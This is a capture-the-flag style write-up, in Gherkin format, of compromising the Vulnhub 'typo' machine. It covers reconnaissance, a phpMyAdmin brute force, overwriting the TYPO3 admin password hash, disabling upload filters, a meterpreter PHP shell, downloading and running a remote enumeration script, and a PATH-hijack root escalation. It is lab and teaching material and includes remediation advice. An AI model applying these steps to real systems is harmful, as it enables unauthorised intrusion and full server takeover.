## Version 1.4.1
## language: en

Feature:
  TOE:
    vulnhub
  Location:
    http://typo:8081/phpmyadmin
  CWE:
    CWE-307: Improper Restriction of Excessive Authentication Attempts
  Rule:
    REQ.R237: R237. Ascertain human interaction
  Goal:
    Login as root
  Recommendation:
    Limit the number of log-in attempts

  Background:
  Hacker's software:
    | <Software name> | <Version>    |
    | Arch Linux      | 2020.08.01   |
    | Firefox         | 79.0         |
    | Nmap            | 7.80         |
    | VirtualBox      | 6.1          |
    | Gobuster        | 3.0.1        |
    | Metasploit      | v5.0.101-dev |
  TOE information:
    Given I am accessing the site at 192.168.1.69
    And I added the host "typo.local" to my "/etc/hosts"
    """
    192.168.1.64  typo.local  typo.local
    """
    And it runs on virtualbox

  Scenario: Normal use case
    Given I access http://typo.local:8081
    Then I can see phpmyadmin's log-in form [evidence](phpmyadmin.php)

  Scenario: Static detection
    Given I don't have access to the source code
    Then I can't perform a static detection

  Scenario: Dynamic detection
    Given run nmap against the machine
    """
    $ nmap -p- typo.local
    """
    Then I find five ports open
    """
    PORT     STATE SERVICE
    22/tcp   open  ssh
    80/tcp   open  http
    8000/tcp open  http-alt
    8080/tcp open  http-proxy
    8081/tcp open  blackice-icecap
    """
    When I run "gobuster" on port 8081
    """
    $ gobuster dir -u http://typo.local:8081/ -w dict.txt
    """
    Then I find
    """
    ...
    /.htpasswd (Status: 403)
    /.htaccess (Status: 403)
    /phpmyadmin (Status: 301)
    /server-status (Status: 403)
    ...
    """
    When I go to "http://typo.local/phpmyadmin"
    Then I find phpmyadmin's log-in form
    When I try several wrong credentials
    Then I can see the page does not limit the number of attempts
    And I can conclude that I can brute force the log-in form

  Scenario: Exploitation
    When I use this script to brute force the credentials
    """
    https://github.com/safflower/phpmyadmin-authentication-bruteforce
    """
    Then I find that the credentials are "root:root"
    And I can log-in as root [evidence](phpmyadminroot.png)
    Then I can conclude the site can be exploited

  Scenario: Maintaining access
    Given I have acces to the DB
    Then if I go to "TYPO3" I can see the table "be_users"
    And I can see all users and its hashed passwords [evidence](admindb.png)
    When I go to
    """
    https://antelle.net/argon2-browser/
    """
    Then I can generate a new hash [evidence](argon2.png)
    When I change admin's hash for the one I generated
    Then I can log-in with credentials "admin:test" [evidence](typoadmin.png)
    When I go to "Settings", "Configure Installation"
    Then I can change "[BE][fileDenyPattern]" to allow the upload of php files
    """
    \.(php[3-8]?|phpsh|phtml|pht|phar|shtml|cgi)(\..*)?$|\.pl$|^\.htaccess$
    """
    And I change it for
    """
    \.(phpsh|phtml|pht|phar|shtml|cgi)(\..*)?$|\.pl$|^\.htaccess$
    """
    When I generate a shell with metasploit
    """
    $ msfvenom -p php/meterpreter/bind_tcp -f raw > shell.php
    """
    Then I can upload the shell and acces it from
    """
    http://typo.local/fileadmin/shell.php
    """
    And I can get a "meterpreter" session [evidence](meterpreter.png)
    """
    $ msfconsole
    msf5 > use exploit/multi/handler
    msf5 exploit(multi/handler) > set payload php/meterpreter/bind_tcp
    msf5 exploit(multi/handler) > set RHOST typo.local
    msf5 exploit(multi/handler) > exploit

    [*] Started bind TCP handler against typo.local:4444
    [*] Sending stage (38288 bytes) to typo.local
    [*] Meterpreter session 1 opened (0.0.0.0:0 -> 192.168.1.64:4444) at \
    2020-08-31 10:57:25 -0500

    meterpreter > shell
    Process 14909 created.
    Channel 0 created.
    """
    When I download and run the script
    """
    $ wget https://raw.githubusercontent.com/diego-treitos/linux-smart-enumera\
      tion/master/lse.sh
    $ sh lse.sh
    """
    Then I can see two interesting files [evidence](setuid.png)
    And those files has the flag "setuid" set
    When I run "strings" on "apache2-restart"
    """
    $ strings /usr/local/bin/apache2-restart
    """
    Then I can see the software calls
    """
    service apache2 start
    """
    When I create a new file named "service" with the content
    """
    python3.7 -c 'import pty;pty.spawn("/bin/bash")'
    """
    And add the folder to my "PATH"
    """
    $ PATH=/tmp:$PATH
    $ export PATH
    """
    And I run
    """
    $ /usr/local/bin/apache2-restart
    """
    Then I get a root shell [evidence](root.png)
    And I can conclude I can maintain access to the machine

  Scenario: Remediation
    Given "phpmyadmin" does not limit the number of failed attempts
    Then I recommend using "fail2ban" as stated here to brute force attacks
    """
    https://serverfault.com/questions/435016/custom-fail2ban-filter-for-phpmya\
      dmin-bruteforce-attempts
    """

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    10.0 (Critical) - AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
  Temporal: Attributes that measure the exploit's popularity and fixability
    9.5 (Critical) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    9.5 (Critical) - MAV:N/MAC:L/MPR:N/MUI:N/MS:C/MC:H/MI:H/MA:H

  Scenario: Correlations
    No correlations have been found to this date {2020-08-31}
